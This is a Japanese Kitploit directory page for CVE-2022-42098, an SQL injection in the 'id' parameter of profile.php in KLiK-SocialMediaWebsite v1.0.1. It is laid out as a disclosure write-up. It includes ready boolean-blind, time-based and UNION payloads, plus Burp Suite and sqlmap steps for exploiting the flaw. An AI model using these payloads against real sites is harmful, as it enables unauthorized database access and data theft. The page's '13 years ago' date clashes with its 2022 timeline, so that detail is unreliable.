Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/bypazs/cve-2022-42098
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubbypazs/cve-2022-42098

CVE-2022-42098

KLiK-SocialMediaWebsite v1.0.1 には、profile.php に SQL インジェクションの脆弱性があります。

リポジトリを見る
13年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

KLiK-SocialMediaWebsite バージョン v1.0.1

脆弱性の説明:

KLiK-SocialMediaWebsite v1.0.1 には、profile.php のパラメータ id に SQL インジェクションの脆弱性があります。

攻撃ベクトル:

KLiK-SocialMediaWebsite v1.0.1 では、ユーザーが作成されると、KLiK ユーザーページを通じて他のユーザーを見つけることもできます。profile.php の "id" パラメータは、任意の SQL クエリを注入するために悪用される可能性があります。

影響を受けるもの:

  • http://ip_address/KLiK/profile.php?id=user_id
  • GET /KLiK/login.php

ペイロード:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=27 AND 3227=3227

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=27 AND (SELECT 3046 FROM (SELECT(SLEEP(5)))barN)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: id=-2373 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71787a7171,0x6d67676474624545784f564265735871415865575a4f72697053686d724768624969514c70754459,0x717a707071),NULL,NULL,NULL,NULL,NULL,NULL#

テスト環境:

  1. KLiK SocialMediaWebsite バージョン v1.0.1 (https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1)

  2. Firefox バージョン 105

  3. sqlmap バージョン 1.6.7 stable

攻撃手順:

  1. ユーザー名とパスワードでログインします。
  2. 右上隅にある人物を表すアイコンをクリックします。
  3. Burp Suite を使用してリクエストを傍受します。
  4. KLiK ユーザーページから、名前をクリックして個人を選択します。
  5. Burp Suite に戻り、/profile.php で右クリックして「Copy to file」を選択します。
  6. リクエストファイルを Kali Linux に送信し、それを使用して sqlmap を実行します。
  7. id を通じて SQL インジェクションの脆弱性が発見されました。

発見者:

:shipit: Grim The Ripper Team by SOSECURE Thailand

媒体:

開示タイムライン:

  • 2022–09–28: 脆弱性が発見されました。
  • 2022–09–28: 脆弱性が MITRE 社に報告されました。
  • 2022–10–15: CVE が予約されました。
  • 2022–10–31: 脆弱性が公開開示されました。

参考:

  1. https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1

  2. https://github.com/msaad1999/KLiK-SocialMediaWebsite

ツールをダウンロード